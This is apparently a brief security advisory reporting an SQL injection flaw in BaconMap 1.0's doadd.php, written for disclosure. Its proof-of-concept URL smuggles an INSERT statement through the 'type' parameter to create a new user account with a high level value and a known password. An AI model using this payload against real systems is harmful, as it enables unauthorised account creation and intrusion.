21 lines
No EOL
813 B
Text
21 lines
No EOL
813 B
Text
------------------------------------------------------------------------
|
|
Software................BaconMap 1.0
|
|
Vulnerability...........SQL Injection
|
|
Download................http://baconmap.nmsu.edu/
|
|
Release Date............10/10/2010
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................John Leitch
|
|
Site....................http://www.johnleitch.net/
|
|
Email...................john.leitch5@gmail.com
|
|
------------------------------------------------------------------------
|
|
|
|
--Description--
|
|
|
|
An SQL injection vulnerability in BaconMap 1.0 can be exploited to
|
|
insert data into any table.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/baconmap/doadd.php?type=user%20(email,level,password)%20values%20('test@test.com',256,md5('Password1'));%23&name= |